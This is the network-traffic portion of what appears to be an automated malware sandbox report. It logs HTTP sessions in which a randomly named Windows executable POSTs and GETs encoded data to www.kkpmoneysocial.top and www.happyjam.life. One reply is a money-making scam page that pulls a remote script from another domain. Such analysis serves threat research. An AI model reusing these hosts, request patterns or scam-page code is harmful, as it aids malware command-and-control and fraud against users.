                                                                                                            Data Raw: 34 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 95 28 20 a9 76 24 39 6e b2 34 b2 5c 0c 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 44 47 22 35 92 fe 85 34 6f b0 77 d8 73 ec ad f6 08 83 64 29 96 d7 b8 e9 16 24 33 0c 48 a4 79 5f de 7d 78 3c d2 84 0c 1e bd fc e9 c5 f9 af 3f bf 82 d4 e4 d9 90 0c 9a 07 b2 78 48 06 3a 52 bc 30 43 02 a0 d1 9c f3 1c e5 cc d8 93 99 88 0c 97 c2 76 2e 09 00 40 26 23 56 b6 dd 54 e1 24 a4 1e 17 31 2e dd 22 2d 68 40 00 ae ba 87 be ef 3b 01 19 78 8d da 20 47 c3 20 4a 99 d2 68 42 3a 33 93 fd 63 da 74 0b 96 63 48 e7 1c 17 85 54 86 42 24 85 41 61 42 ba e0 b1 49 c3 18 e7 3c c2 fd aa d1 05 2e b8 e1 2c db d7 11 cb 30 ec 75 41 a7 8a 8b 8b 7d 23 f7 27 dc 84 42 d2 21 a9 75 0b 25 0b 54 66 15 52 99 9c f0 9c 25 d8 d2 f6 98 d6 68 b4 a7 65 c4 59 36 e2 79 72 e0 4e 8b e4 da a9 2d 63 c3 4d d6 36 fe eb 8f df ff 3c 45 63 69 c8 d9 05 42 2e 05 ae 00 99 e6 d9 0a 16 dc a4 90 cb 31 cf 10 8a 54 0a
                                                                                                            Data Ascii: 448n6( v$9n4\m`CDG"54owsd)$3Hy_}x<?xH:R0Cv.@&#VT$1."-h@;x G JhB:3ctcHTB$AaBI<.,0uA}#'B!u%TfR%heY6yrN-cM6<EciB.1T
                                                                                                            Jan 11, 2025 04:25:48.426747084 CET795INData Raw: 84 72 34 2d 89 de a0 1c e3 1a 11 97 a2 a5 ff 1e 81 29 04 93 22 8c 51 1b 40 a6 04 17 09 68 6e 10 a4 c8 b8 40 28 d8 aa ec 92 73 54 f0 b8 7f 08 39 cf 32 2e 05 14 a8 4a 87 4c 0a 46 42 df f7 bb be ef 43 8e f9 18 95 be 39 ba 0a cd 49 c5 b7 e5 c3 91 ef
                                                                                                            Data Ascii: r4-)"Q@hn@(sT92.JLFBC9I\,f*kL)-5P`<2<oDt7.h_cpLowbfAu1,Z2sr{FOuG4e&dU0Y&eB7sx


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.649998104.21.112.1801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:50.360534906 CET1796OUTPOST /86am/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.kkpmoneysocial.top
                                                                                                            Referer: http://www.kkpmoneysocial.top/86am/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 75 50 54 54 52 48 63 5a 7a 56 77 68 4f 76 56 42 30 59 74 31 35 38 68 51 74 46 62 6a 37 43 67 38 34 56 6d 7a 51 30 4d 35 4c 74 30 2f 61 4a 39 41 55 77 53 61 6d 31 79 2b 6a 4d 46 79 41 34 35 70 6b 55 7a 72 66 66 2f 2b 73 57 73 62 2b 4c 47 58 64 62 79 57 4e 51 45 6d 56 31 48 53 65 72 41 54 31 34 31 39 73 50 56 79 34 6b 52 4d 46 2f 77 42 4d 55 38 39 2b 6e 56 6e 66 2b 66 52 64 42 57 77 42 57 63 6f 64 6e 35 4f 69 4d 44 78 36 33 4e 33 36 35 77 6d 4d 4c 41 4f 32 75 62 66 56 6c 62 6a 6f 35 41 75 72 47 77 4c 68 2b 59 30 38 61 48 68 73 65 43 79 6d 47 65 76 64 41 71 2b 64 44 72 38 4f 42 50 4e 63 38 6a 39 6e 70 52 48 6f 55 53 41 54 4a 31 72 66 65 56 2b 6e 37 6b 77 52 52 54 4f 46 33 6d 47 49 61 47 34 59 36 51 7a 6d 35 67 70 46 79 56 6b 42 77 68 55 72 49 77 38 33 32 4a 34 54 46 76 64 7a 72 48 32 44 55 4a 48 55 49 36 47 62 75 48 35 59 66 4c 37 74 70 54 4f 69 4b 76 6a 56 4e 6c [TRUNCATED]
                                                                                                            Data Ascii: 9PZt=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzuPTTRHcZzVwhOvVB0Yt158hQtFbj7Cg84VmzQ0M5Lt0/aJ9AUwSam1y+jMFyA45pkUzrff/+sWsb+LGXdbyWNQEmV1HSerAT1419sPVy4kRMF/wBMU89+nVnf+fRdBWwBWcodn5OiMDx63N365wmMLAO2ubfVlbjo5AurGwLh+Y08aHhseCymGevdAq+dDr8OBPNc8j9npRHoUSATJ1rfeV+n7kwRRTOF3mGIaG4Y6Qzm5gpFyVkBwhUrIw832J4TFvdzrH2DUJHUI6GbuH5YfL7tpTOiKvjVNliB3wd25QPeijIUcKkintQ1Cobz+iLeQmNYgAJmbEROu9ji+lkDnT4QZoBxI6Z8C2Q2TCX9lqBKk+M+OhhJDd7nzXKZOkLy/h/0wEAx/AIswkuP/dQ4NDu7vYwFQM3dxzc2q6al2CLliRL4eDzBIFkFVjIEbGJ3DeAXxhkjtnT84mdT8SXFf/LKbqShIOqtyJY4C4axzyiAbPXdxq6gFy/DyhbkBm4CfS8x7/eqJZxhbIvXdtmyEcyomSltgFxJGOkyfvb2J/g3gGD72PBWVTK7qDotX5KsyblB5N09/cjbDYskH0XivmVTJPytCLcC+FReeYfehEwHkBELca6GT+A1GLZ+MusUupVTfWuvt6E1C4dvzW+i84vMfHdnWApaCM/spamdC+V/eo75hQd1MH6ixw0jD8lwVeKRnKQWzD+c9YtLGbqQY3FIYkcCjokJutElK4MQQCDSvKF/+dyCza1Ew1o6t+jijbIZuE1ZakwhblInPZizQu/ClYcYVIQqNkB5S8sMAupMfuqHH6wn79X0SYri9SFGyR65g/Kzh7MTzs3mpQP448DLQTv2t71559YHG6VqhD4qPOkQN4Sv3Z8sS3Mm0k5I3Fyipno1v7GQ/FYO+TPb2vhczx+FI+SeHXrvmCP7ntZLbZMnli707z2gb8V7ROk8DaaS [TRUNCATED]
                                                                                                            Jan 11, 2025 04:25:51.015564919 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:50 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:50 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWfy2T9DV3mOXV0pIBDp9suWwNT8hGDGTinT4ca5g9CGcHGDrK5g8Mw4vTz1ftb%2F2S6PlfHcz43okPfO7bVH3za%2FML3PDw2WzJfGYhwOM8LD3fiJWGc4ewpezTPi%2FPx8BUJN9rb70qAe"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd484b42c34f-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1421&min_rtt=1421&rtt_var=710&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 34 34 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 95 28 20 a9 76 24 39 5e b2 34 b2 5c 14 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 44 47 22 35 92 fe 85 34 6f b0 77 d8 73 ec ad f6 08 83 64 29 96 d7 b8 e9 16 24 33 0c 48 a4 79 5f de 7d 78 3c d2 84 0c 1e bd fc e9 c5 f9 af 3f bf 82 d4 e4 d9 90 0c 9a 07 b2 78 48 06 3a 52 bc 30 43 02 a0 d1 9c f3 1c e5 cc d8 93 99 88 0c 97 c2 76 2e 09 00 40 26 23 56 b6 dd 54 e1 24 a4 1e 17 31 2e dd 22 2d 68 40 00 ae ba 87 be ef 3b 01 19 78 8d da 20 47 c3 20 4a 99 d2 68 42 3a 33 93 fd 63 da 74 0b 96 63 48 e7 1c 17 85 54 86 42 24 85 41 61 42 ba e0 b1 49 c3 18 e7 3c c2 fd aa d1 05 2e b8 e1 2c db d7 11 cb 30 ec 75 41 a7 8a 8b 8b 7d 23 f7 27 dc 84 42 d2 21 a9 75 0b 25 0b 54 66 15 52 99 9c f0 9c 25 d8 d2 f6 98 d6 68 b4 a7 65 c4 59 36 e2 79 72 e0 4e 8b e4 da a9 2d 63 c3 4d d6 36 fe eb 8f df ff 3c 45 63 69 c8 d9 05 42 2e 05 ae 00 99 e6 d9 0a 16 dc a4 90 cb 31 cf 10 8a 54 0a 84 72 34 2d 89
                                                                                                            Data Ascii: 447n6( v$9^4\m`CDG"54owsd)$3Hy_}x<?xH:R0Cv.@&#VT$1."-h@;x G JhB:3ctcHTB$AaBI<.,0uA}#'B!u%TfR%heY6yrN-cM6<EciB.1Tr4-
                                                                                                            Jan 11, 2025 04:25:51.015644073 CET789INData Raw: de a0 1c e3 1a 11 97 a2 a5 ff 1e 81 29 04 93 22 8c 51 1b 40 a6 04 17 09 68 6e 10 a4 c8 b8 40 28 d8 aa ec 92 73 54 f0 b8 7f 08 39 cf 32 2e 05 14 a8 4a 87 4c 0a 46 42 df f7 bb be ef 43 8e f9 18 95 be 39 ba 0a cd 49 c5 b7 e5 c3 91 ef 17 cb af 19 a4
                                                                                                            Data Ascii: )"Q@hn@(sT92.JLFBC9I\wYTS[,EQ[kdCxdx^>K*8.!\4*YpcPDL-1=sVG4#FSqnuQr,nY.LdE*AEq


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.649999104.21.112.1801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:52.902344942 CET490OUTGET /86am/?9PZt=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:25:53.531573057 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:53 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:53 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYGSN%2Bl4qK2fVP8wJUbrrT1%2FvyR92zQwVG8sWD2ql0YO75poLZzdGwxdQOThWyX9rJSYM9jnB3s5zT6LNzLAxyZrrE%2FClrCFSsxKmvP65CjKrrYS7iT%2BuZElu%2Bt8BUYMAHKGqOAv05Qs"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd580ca8424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=490&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 64 63 36 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 22 3b 0a 20 20 7d 2c 35 30 30 30 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 61 73 73 65 74 73 2f 73 6f 63 69 61 6c 5f 69 6d 67 32 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 f0 9f 8c b9 4c 65 74 [TRUNCATED]
                                                                                                            Data Ascii: dc6<!DOCTYPE html><html><head><script> setTimeout(function(){ location.href="/index.php"; },5000);</script><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta property="og:image" content="/assets/social_img2.jpg"><meta property="og:title" content="Let's
                                                                                                            Jan 11, 2025 04:25:53.531589985 CET1236INData Raw: 6d 61 6b 65 20 6d 6f 6e 65 79 20 65 61 73 69 6c 79 20 77 69 74 68 20 6d 6f 62 69 6c 65 20 70 68 6f 6e 65 20 f0 9f 8c b9 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65
                                                                                                            Data Ascii: make money easily with mobile phone "> <meta property="og:description" content="We are the best earning site online paying over $35 million per month to 300,000 members"><meta property="og:image:width" content="600px"><meta property="o
                                                                                                            Jan 11, 2025 04:25:53.531605005 CET1236INData Raw: 77 20 52 65 67 45 78 70 28 22 28 5e 7c 20 29 22 2b 6e 61 6d 65 2b 22 3d 28 5b 5e 3b 5d 2a 29 28 3b 7c 24 29 22 29 3b 0a 20 20 20 20 20 20 69 66 28 61 72 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 72 65 67 29 29 0a 20
                                                                                                            Data Ascii: w RegExp("(^| )"+name+"=([^;]*)(;|$)"); if(arr=document.cookie.match(reg)) { return unescape(arr[2]); } else { return ""; } } function rset_Cookie(name,value) {
                                                                                                            Jan 11, 2025 04:25:53.531662941 CET725INData Raw: 2e 70 68 70 3f 63 6f 64 65 3d 4d 48 78 38 64 33 64 33 4c 6d 74 72 63 47 31 76 62 6d 56 35 63 32 39 6a 61 57 46 73 4c 6e 52 76 63 48 78 38 4d 41 3d 3d 27 3b 7d 3b 7d 29 3b 0d 0a 24 2e 67 65 74 53 63 72 69 70 74 28 27 2f 2f 6d 6f 6e 65 79 65 61 73
                                                                                                            Data Ascii: .php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==';};});$.getScript('//moneyeasilyijy.top/typed.js?1736565953',function(){ if(!rget_Cookie('hasgo')){rset_Cookie('godomain','moneyeasilyijy.top');rset_Cookie('area','');rset_Cookie_fast('hasgo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.650001209.74.77.107801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:06.783107042 CET744OUTPOST /4t49/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.happyjam.life
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.happyjam.life
                                                                                                            Referer: http://www.happyjam.life/4t49/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 68 59 57 64 59 39 47 48 4b 6b 6e 4d 35 6d 5a 74 74 39 34 61 79 2b 5a 49 4b 68 64 44 71 37 56 6b 49 49 4e 71 49 41 59 61 38 64 48 59 76 2f 75 46 37 56 4a 68 30 32 68 5a 57 7a 78 35 75 33 5a 53 35 71 33 5a 58 2f 48 66 35 46 42 55 75 47 49 41 54 47 57 7a 74 59 4f 63 4c 42 62 4e 54 4b 74 31 78 57 35 63 4a 71 71 67 45 4b 49 4c 62 6f 32 4f 79 49 37 46 42 6e 72 42 36 45 45 50 47 51 69 4b 30 6c 65 5a 66 44 48 68 44 4d 59 6a 57 4c 41 47 65 41 63 2f 30 78 2b 67 50 2b 75 76 36 63 67 72 65 61 79 75 63 57 41 6a 2b 51 4f 4d 57 47 39 70 30 79 69 4b 76 55 48 51 78 67 59 38 49 63 50 69
                                                                                                            Data Ascii: 9PZt=nQ80xGd328mxhYWdY9GHKknM5mZtt94ay+ZIKhdDq7VkIINqIAYa8dHYv/uF7VJh02hZWzx5u3ZS5q3ZX/Hf5FBUuGIATGWztYOcLBbNTKt1xW5cJqqgEKILbo2OyI7FBnrB6EEPGQiK0leZfDHhDMYjWLAGeAc/0x+gP+uv6cgreayucWAj+QOMWG9p0yiKvUHQxgY8IcPi
                                                                                                            Jan 11, 2025 04:26:07.351397991 CET533INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:07 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.650002209.74.77.107801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:09.327924013 CET768OUTPOST /4t49/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.happyjam.life
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.happyjam.life
                                                                                                            Referer: http://www.happyjam.life/4t49/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 39 6b 47 4d 4a 71 4c 45 4d 61 2f 64 48 59 6e 66 75 63 2f 56 49 6a 30 33 63 6b 57 79 4e 35 75 33 4e 53 35 71 48 5a 58 6f 7a 63 2f 46 42 57 69 6d 49 43 65 6d 57 7a 74 59 4f 63 4c 42 66 6e 54 4b 31 31 77 6d 4a 63 4c 4f 47 6a 4e 71 49 45 4d 59 32 4f 32 49 37 42 42 6e 71 69 36 42 63 31 47 53 61 4b 30 67 79 5a 52 32 6e 69 4b 4d 59 68 4c 62 42 6b 56 79 4a 79 30 44 79 67 46 4f 2f 44 68 50 38 4b 53 4d 76 30 41 6c 41 41 73 41 75 4f 57 45 6c 62 30 53 69 67 74 55 2f 51 6a 33 55 62 48 6f 71 42 48 34 4b 58 55 4b 30 70 6c 72 31 6e 56 36 65 7a 4d 7a 77 4d 56 67 3d 3d
                                                                                                            Data Ascii: 9PZt=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN9kGMJqLEMa/dHYnfuc/VIj03ckWyN5u3NS5qHZXozc/FBWimICemWztYOcLBfnTK11wmJcLOGjNqIEMY2O2I7BBnqi6Bc1GSaK0gyZR2niKMYhLbBkVyJy0DygFO/DhP8KSMv0AlAAsAuOWElb0SigtU/Qj3UbHoqBH4KXUK0plr1nV6ezMzwMVg==
                                                                                                            Jan 11, 2025 04:26:09.894550085 CET533INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:09 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.650003209.74.77.107801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:12.003396034 CET1781OUTPOST /4t49/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.happyjam.life
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.happyjam.life
                                                                                                            Referer: http://www.happyjam.life/4t49/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 31 6b 47 35 64 71 52 6a 77 61 2b 64 48 59 70 2f 75 42 2f 56 49 69 30 33 45 6f 57 79 41 43 75 31 31 53 2f 4a 2f 5a 41 71 62 63 73 6c 42 57 71 47 49 42 54 47 58 7a 74 59 2b 41 4c 42 76 6e 54 4b 31 31 77 6c 52 63 50 61 71 6a 4c 71 49 4c 62 6f 32 53 79 49 37 70 42 6a 2b 63 36 42 51 6c 48 6d 6d 4b 30 41 69 5a 64 6c 50 69 46 4d 59 6e 49 62 42 43 56 79 55 79 30 44 76 54 46 4f 4b 65 68 4e 67 4b 57 35 79 4f 51 55 34 45 7a 79 75 6a 43 55 42 75 77 6b 4b 56 6a 43 6a 4a 72 47 59 32 4b 71 53 4a 66 59 4b 79 5a 34 6c 52 72 36 4e 70 57 39 6e 38 46 44 78 54 43 33 35 50 61 61 32 4f 7a 59 70 64 6f 75 37 58 58 4c 74 30 34 36 44 63 51 57 79 46 42 6d 44 54 42 6f 6c 71 48 56 6a 75 2b 6b 4c 70 2f 69 78 74 7a 4e 6e 36 58 56 6f 53 4f 75 31 65 38 38 52 67 65 63 46 54 32 59 6e 39 61 67 79 48 55 61 4c 4c 68 36 48 79 30 43 5a 53 66 49 53 50 33 31 46 47 52 42 6f 4a 70 62 4a 55 2f 78 46 63 34 